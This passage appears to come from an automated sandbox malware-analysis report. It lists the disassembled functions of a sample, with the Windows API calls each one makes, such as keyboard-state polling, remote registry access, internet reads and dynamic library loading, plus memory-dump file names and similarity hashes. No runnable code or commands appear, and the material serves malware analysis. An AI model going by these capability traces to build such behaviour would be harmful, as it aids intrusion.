kernel32.dll, xrefs: 00764E5B
Wow64RevertWow64FsRedirection, xrefs: 00764E6E

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 2b92c22e44762883281154a33317a64be01017698cc518ed52a33430418a7c5b
Instruction ID: 8a02ba3daef6368c0de14d22f79a1af3b570b401d918ba55b923df76cc5bf34a
Opcode Fuzzy Hash: 2b92c22e44762883281154a33317a64be01017698cc518ed52a33430418a7c5b
Instruction Fuzzy Hash: F0D0C27950263A5B86231B247D18DAB2B18AF81B113054111BD06E2210CF2DCD11C1D4

Function 007EA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 007EA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EA468
CloseHandle.KERNEL32(?), ref: 007EA63D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 7968b5a5a46baf91dae89aaa0255724e63b3fc40ee7fabebd96326b61197ee2f
Instruction ID: 7c3872ce03ca02a53be426cd03c823782d1b7b77bc273c2ebd3e70c516c1c883
Opcode Fuzzy Hash: 7968b5a5a46baf91dae89aaa0255724e63b3fc40ee7fabebd96326b61197ee2f
Instruction Fuzzy Hash: 85A19271604340EFD720DF15C88AF2AB7E5AF88714F14885DF99A9B292D7B4EC41CB92

Function 0079BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00803700), ref: 0079BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0083121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0079BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00831270,000000FF,?,0000003F,00000000,?), ref: 0079BC36
_free.LIBCMT ref: 0079BB7F

Part of subcall function 007929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000), ref: 007929DE
Part of subcall function 007929C8: GetLastError.KERNEL32(00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000,00000000), ref: 007929F0

_free.LIBCMT ref: 0079BD4B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 8a4bc453f36ee5f43bd142b93136e8e6ddeaa72aa6c1ad37297b5e09ac1436e7
Instruction ID: 63b2aba93fa494b76ef75ab309d051fe6558b6c3ab620ab5773ddfc7d0b2f543
Opcode Fuzzy Hash: 8a4bc453f36ee5f43bd142b93136e8e6ddeaa72aa6c1ad37297b5e09ac1436e7
Instruction Fuzzy Hash: F151FB71900209EFCF10EF65BD8997EB7BCFF81720B10466AE514D7291DB789D418BA0

Function 007CE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007CDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007CCF22,?), ref: 007CDDFD

Part of subcall function 007CDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007CCF22,?), ref: 007CDE16

Part of subcall function 007CE199: GetFileAttributesW.KERNEL32(?,007CCF95), ref: 007CE19A

lstrcmpiW.KERNEL32(?,?), ref: 007CE473
MoveFileW.KERNEL32(?,?), ref: 007CE4AC
_wcslen.LIBCMT ref: 007CE5EB
_wcslen.LIBCMT ref: 007CE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 007CE650

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: d2e1e2ea78b90dc210b27b45daef578dadfc2925854d9d90a177d9b832f1cb3c
Instruction ID: 39ea969b3ced0524631a0f6d035305e11ce11ff587fb213b229b763a861ded3f
Opcode Fuzzy Hash: d2e1e2ea78b90dc210b27b45daef578dadfc2925854d9d90a177d9b832f1cb3c
Instruction Fuzzy Hash: 155155B25087859BD724EB90DC85EDFB3DCAF85340F00491EF689D3191EF78A6888766

Function 007EB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007EC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EB6AE,?,?), ref: 007EC9B5
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007EC9F1
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007ECA68
Part of subcall function 007EC998: _wcslen.LIBCMT ref: 007ECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007EBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007EBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007EBB63
RegCloseKey.ADVAPI32(?,?), ref: 007EBBA6
RegCloseKey.ADVAPI32(00000000), ref: 007EBBB3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 3127f98e26a88c5d5204bb05af513fcc1feb486bcf0bb70a77c36843dfafc5c5
Instruction ID: a8b7e3d3f8ab57d9c513f1a2f257495208e90cb6f9d9ef1b24de19f0eba406a1
Opcode Fuzzy Hash: 3127f98e26a88c5d5204bb05af513fcc1feb486bcf0bb70a77c36843dfafc5c5
Instruction Fuzzy Hash: 66617E71109241EFD714DF24C894E2ABBE5BF88308F14856CF4968B292DB35ED45CB92

Function 007C8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007C8BCD
VariantClear.OLEAUT32 ref: 007C8C3E
VariantClear.OLEAUT32 ref: 007C8C9D
VariantClear.OLEAUT32(?), ref: 007C8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007C8D3B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 1d579d9238b51fc51d63923627bcb4a9ec4e61f8e26223e36ff8f0f2024ca592
Instruction ID: 2f07d2d64205eb3c16cc46d469c53c7330d1da748b22b55ffe5b5b3ffe77784b
Opcode Fuzzy Hash: 1d579d9238b51fc51d63923627bcb4a9ec4e61f8e26223e36ff8f0f2024ca592
Instruction Fuzzy Hash: 555148B5A00219EFCB10CF68D884EAABBF4FF89310B15855DE916DB350E734E911CB90

Function 007D8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007D8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007D8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007D8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007D8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007D8C5F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 443c8f4c104e21f3c0098eac606db3266b0e7423c1c559a48e5672f6402b7072
Instruction ID: 4759ecdf4f274f42162138eb0cca91e12ea19bd78489272ef5dda10b57b04712
Opcode Fuzzy Hash: 443c8f4c104e21f3c0098eac606db3266b0e7423c1c559a48e5672f6402b7072
Instruction Fuzzy Hash: A0515D35A00215DFCB05DF64C884A69BBF5FF48314F08C499E84AAB362DB39ED51DBA1

Function 007E8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 007E8F40
GetProcAddress.KERNEL32(00000000,?), ref: 007E8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 007E8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 007E9032
FreeLibrary.KERNEL32(00000000), ref: 007E9052

Part of subcall function 0077F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,007D1043,?,75B8E610), ref: 0077F6E6
Part of subcall function 0077F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,007BFA64,00000000,00000000,?,?,007D1043,?,75B8E610,?,007BFA64), ref: 0077F70D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: f4a05b781a87d6e36b661b8d8fb100bdc6e7748197ca3006cb293c661d0bc01d
Instruction ID: 9c1b4a1afbb05910fa50d164577a74cba987d0ce1358311bd80e47bba8439ffb
Opcode Fuzzy Hash: f4a05b781a87d6e36b661b8d8fb100bdc6e7748197ca3006cb293c661d0bc01d
Instruction Fuzzy Hash: 16514835601245DFCB11DF59C4848ADBBF1FF49314F0880A9E90AAB362DB39ED85CB91

Function 00792051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007920C3
_free.LIBCMT ref: 007920E3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 894b3c731dc17b02cde08ff19c3340241f898aa1426a5a09a9a476ed70bf4602
Instruction ID: 6a6a565b4ba38f663bab2e19376d801cb45e34d60e439dce7101526c7f198fb1
Opcode Fuzzy Hash: 894b3c731dc17b02cde08ff19c3340241f898aa1426a5a09a9a476ed70bf4602
Instruction Fuzzy Hash: 4941E232A00204EFCF20EF78D885A6DB7A5EF88310F1585A8E515EB352DA35AD02CB81

Function 0077912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00779141
ScreenToClient.USER32(00000000,?), ref: 0077915E
GetAsyncKeyState.USER32(00000001), ref: 00779183
GetAsyncKeyState.USER32(00000002), ref: 0077919D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: e7436a4388398170cd9bcf32952ea8c15b4877154bc6bd5625a1bfb73892b8fc
Instruction ID: 6b6da8b6235d655ff841665bb4c3adfa48cbd0e81726d43f84a3082876fa4506
Opcode Fuzzy Hash: e7436a4388398170cd9bcf32952ea8c15b4877154bc6bd5625a1bfb73892b8fc
Instruction Fuzzy Hash: 6741707190860EFBDF099F68C848BFEB775FB45360F208215E529A7290D7385D64CB61

Function 007D3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 007D38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 007D3922
TranslateMessage.USER32(?), ref: 007D394B
DispatchMessageW.USER32(?), ref: 007D3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007D3966

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 9bec757e5d36707daf17f4f9bd65170f97650711b790d0423d1242632d353489
Instruction ID: 24199e22cf93012198a13fb11f4ce83fb2cd298bac195794d9565038685a69cb
Opcode Fuzzy Hash: 9bec757e5d36707daf17f4f9bd65170f97650711b790d0423d1242632d353489
Instruction Fuzzy Hash: 2831B7705043459EEF35CB34995CBB67BB8BB45308F14496BE466823A0E3FCB684DB22

Function 007DCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,007DC21E,00000000), ref: 007DCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 007DCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,007DC21E,00000000), ref: 007DCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,007DC21E,00000000), ref: 007DCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,007DC21E,00000000), ref: 007DCFF2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 866fbff8f714a4b8d4cb6b23886c4d81d9f219e9f1c9443cafd971ebd6c0abd0
Instruction ID: 7127112346c2119cd96935b5328c3ecc8310fcd19a22694f9d61fbda53b9333f
Opcode Fuzzy Hash: 866fbff8f714a4b8d4cb6b23886c4d81d9f219e9f1c9443cafd971ebd6c0abd0
Instruction Fuzzy Hash: CA313072604306EFDB22DFA5C9849ABBBF9EF14351B10842FF516D2251DB38AE41DB60

Function 007C1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007C1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 007C19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 007C19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 007C19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 007C19E2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: ad91fbdf50d3ee6f72f48828f07b5b0fd93918018ccc4a026194711b0e1a68e0
Instruction ID: c8c3fa0d30b88b86086b5332716afdecd20d6fff3b2cee1c4af98d9e8201bebe
Opcode Fuzzy Hash: ad91fbdf50d3ee6f72f48828f07b5b0fd93918018ccc4a026194711b0e1a68e0
Instruction Fuzzy Hash: 3D31CF71900259EFCB00CFA8C999BEE3BB5EB05314F00826DF921A72D1C374A954CB90

Function 007E0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 007E0951
GetForegroundWindow.USER32 ref: 007E0968
GetDC.USER32(00000000), ref: 007E09A4
GetPixel.GDI32(00000000,?,00000003), ref: 007E09B0
ReleaseDC.USER32(00000000,00000003), ref: 007E09E8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: c910476befb35fb98138497e93def4de8c3924c64a3aa5b234cdabbeab040ed1
Instruction ID: 7c25accc5b1bd002333bffbc4faf2a368d1cfeaafc217d5adb274eac6f3df764
Opcode Fuzzy Hash: c910476befb35fb98138497e93def4de8c3924c64a3aa5b234cdabbeab040ed1
Instruction Fuzzy Hash: 40219335600204EFD704EF65D988AAEBBF5EF49700F048469F84AE7762DB78AC44DB90

Function 0079CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0079CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0079CDE9

Part of subcall function 00793820: RtlAllocateHeap.NTDLL(00000000,?,00831444,?,0077FDF5,?,?,0076A976,00000010,00831440,007613FC,?,007613C6,?,00761129), ref: 00793852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0079CE0F
_free.LIBCMT ref: 0079CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0079CE31

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: cbd1534da3c3fbef9771a31defd1e936672ef2d7e4e6971605977e41afe4ab5e
Instruction ID: 8eda1053d8243cc548707c6b5c40115b7c9faa49b5665111216d8b4ccdc33f8e
Opcode Fuzzy Hash: cbd1534da3c3fbef9771a31defd1e936672ef2d7e4e6971605977e41afe4ab5e
Instruction Fuzzy Hash: 7001F7726012197F2F2356B67C8CC7B7A6DDEC6BA1315412DFD06C7201EA688D01C2F4

Function 00779639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00779693
SelectObject.GDI32(?,00000000), ref: 007796A2
BeginPath.GDI32(?), ref: 007796B9
SelectObject.GDI32(?,00000000), ref: 007796E2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 0a7404e856c592e5d7ad5ced13076588cb497f41b32d0f741ccc9a768bcc50e7
Instruction ID: e2e8c85fb6b19e604674c94ea611b53f68f767e8fd281c5fef16cb3c23bd0098
Opcode Fuzzy Hash: 0a7404e856c592e5d7ad5ced13076588cb497f41b32d0f741ccc9a768bcc50e7
Instruction Fuzzy Hash: 50218070802309EBDF119F24DD0CBA93FB8BB80BA5F508716F914E61B0D3799892CB94

Function 007C5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 007C5726
_memcmp.LIBVCRUNTIME ref: 007C5744
_memcmp.LIBVCRUNTIME ref: 007C5757
_memcmp.LIBVCRUNTIME ref: 007C576F
_memcmp.LIBVCRUNTIME ref: 007C5787

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
